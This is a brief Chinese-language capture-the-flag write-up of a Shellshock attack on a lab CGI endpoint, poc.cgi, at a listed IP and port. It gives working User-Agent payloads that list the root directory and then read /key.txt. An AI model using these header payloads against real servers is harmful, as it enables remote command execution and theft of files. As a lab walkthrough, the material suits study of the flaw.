这个漏洞是看别人的思路解出来的,因为在打开页面后,我扫描不出来其他东西,惭愧
后台存在一个地址,是http://219.153.49.228:49581/cgi-bin/poc.cgi
访问这个地址
对着地址进行抓包
将user-agent进行修改,修改为() { :;}; echo; /bin/ls /
重放一下看下效果
能看到读取出了目录的内容,我们直接读取key.txt,将user-agent修改为:() { :;}; echo; /bin/cat /key.txt。拿到key